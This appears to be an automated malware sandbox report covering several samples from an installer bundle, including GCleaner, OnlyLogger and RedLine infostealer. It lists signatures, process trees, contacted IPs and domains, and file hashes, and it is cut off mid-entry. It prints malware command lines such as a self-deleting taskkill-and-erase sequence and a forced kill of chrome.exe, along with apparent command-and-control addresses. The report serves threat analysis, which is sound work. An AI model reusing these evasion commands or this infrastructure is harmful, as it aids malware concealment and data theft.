Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.listincode.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 panelbot.webtm.ru udp
RU 92.53.96.150:80 panelbot.webtm.ru tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 vh300.timeweb.ru udp
RU 92.53.96.150:443 vh300.timeweb.ru tcp
US 8.8.8.8:53 150.96.53.92.in-addr.arpa udp
US 8.8.8.8:53 133.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 133.194.101.151.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer\zip.zip

MD5 4298fa80523abf31d8d2dba0eecc47f4
SHA1 57849373d58c4afee2cfc8e64839b9f03929a67a
SHA256 5585cf0ec6321a62b8d7572e5eaaec6c092577d63713b503713e81288e8466ce
SHA512 548e1821d46e590c7782485be58a8b214819f7279dd537bff95101c165e6dc68783c67eb3cf41e6791029b1cb8221c76a04c32eb8b93ab12d38ada1376997bc5

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:30

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09f257bb7877d00b2.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09f257bb7877d00b2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09f257bb7877d00b2.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp

Files

memory/2960-0-0x00007FFD6D783000-0x00007FFD6D785000-memory.dmp

memory/2960-1-0x0000000000A90000-0x0000000000A98000-memory.dmp

memory/2960-2-0x00007FFD6D780000-0x00007FFD6E241000-memory.dmp

memory/2960-3-0x00007FFD6D780000-0x00007FFD6E241000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20241010-en

Max time kernel

118s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Wed09c42cad92c20f79.exe" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 myloveart.top udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:80 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:80 iplogger.org tcp
US 104.26.3.46:80 iplogger.org tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:80 api.ip.sb tcp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 freegeoip.app udp
US 104.21.73.97:80 freegeoip.app tcp
US 8.8.8.8:53 ipbase.com udp
US 172.67.209.71:80 ipbase.com tcp
US 172.67.209.71:443 ipbase.com tcp
US 104.26.12.31:80 api.ip.sb tcp
US 8.8.8.8:53 script.google.com udp
GB 216.58.201.110:80 script.google.com tcp
GB 216.58.201.110:443 script.google.com tcp
US 8.8.8.8:53 youtube4kdowloader.club udp

Files

memory/2000-1-0x0000000002D60000-0x0000000002E60000-memory.dmp

memory/2000-2-0x0000000000220000-0x000000000026A000-memory.dmp

memory/2000-3-0x0000000000400000-0x000000000044C000-memory.dmp

memory/2000-4-0x0000000002D60000-0x0000000002E60000-memory.dmp

memory/2000-6-0x0000000000220000-0x000000000026A000-memory.dmp

memory/2000-5-0x0000000000400000-0x0000000002BC3000-memory.dmp

memory/2000-7-0x0000000000400000-0x000000000044C000-memory.dmp

memory/2000-9-0x0000000000400000-0x000000000044C000-memory.dmp

memory/2000-8-0x0000000000400000-0x0000000002BC3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240729-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09cfb2f9758281d8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Wed09cfb2f9758281d8.exe" /f

Network

N/A

Files

memory/2716-2-0x00000000001B0000-0x00000000001FC000-memory.dmp

memory/2716-1-0x00000000002D0000-0x00000000003D0000-memory.dmp

memory/2716-3-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2716-6-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2716-5-0x00000000001B0000-0x00000000001FC000-memory.dmp

memory/2716-4-0x0000000000400000-0x000000000058E000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe"

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2472 set thread context of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 2472 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp

Files

memory/2472-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp

memory/2472-1-0x0000000000CA0000-0x0000000000D0A000-memory.dmp

memory/2472-2-0x0000000005510000-0x0000000005586000-memory.dmp

memory/2472-3-0x00000000054B0000-0x00000000054CE000-memory.dmp

memory/2472-4-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/2472-5-0x0000000005CD0000-0x0000000006274000-memory.dmp

memory/2376-6-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed0901eb1dae126e32.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/2472-9-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/2376-10-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/2376-11-0x00000000052B0000-0x00000000058C8000-memory.dmp

memory/2376-12-0x0000000004E80000-0x0000000004E92000-memory.dmp

memory/2376-13-0x0000000004FB0000-0x00000000050BA000-memory.dmp

memory/2376-14-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/2376-15-0x0000000004EE0000-0x0000000004F1C000-memory.dmp

memory/2376-16-0x0000000004F20000-0x0000000004F6C000-memory.dmp

memory/2376-17-0x0000000074BF0000-0x00000000753A0000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3020 set thread context of 1904 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp

Files

memory/3020-0-0x000000007477E000-0x000000007477F000-memory.dmp

memory/3020-1-0x00000000000A0000-0x0000000000108000-memory.dmp

memory/3020-2-0x0000000004A50000-0x0000000004AC6000-memory.dmp

memory/3020-3-0x0000000004A20000-0x0000000004A3E000-memory.dmp

memory/3020-4-0x0000000074770000-0x0000000074F20000-memory.dmp

memory/3020-5-0x00000000051F0000-0x0000000005794000-memory.dmp

memory/1904-6-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed0971f17486f8.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/1904-10-0x0000000074770000-0x0000000074F20000-memory.dmp

memory/3020-9-0x0000000074770000-0x0000000074F20000-memory.dmp

memory/1904-11-0x0000000005570000-0x0000000005B88000-memory.dmp

memory/1904-12-0x0000000005120000-0x0000000005132000-memory.dmp

memory/1904-13-0x0000000005290000-0x000000000539A000-memory.dmp

memory/1904-14-0x0000000074770000-0x0000000074F20000-memory.dmp

memory/1904-15-0x00000000051E0000-0x000000000521C000-memory.dmp

memory/1904-16-0x0000000005220000-0x000000000526C000-memory.dmp

memory/1904-17-0x0000000074770000-0x0000000074F20000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
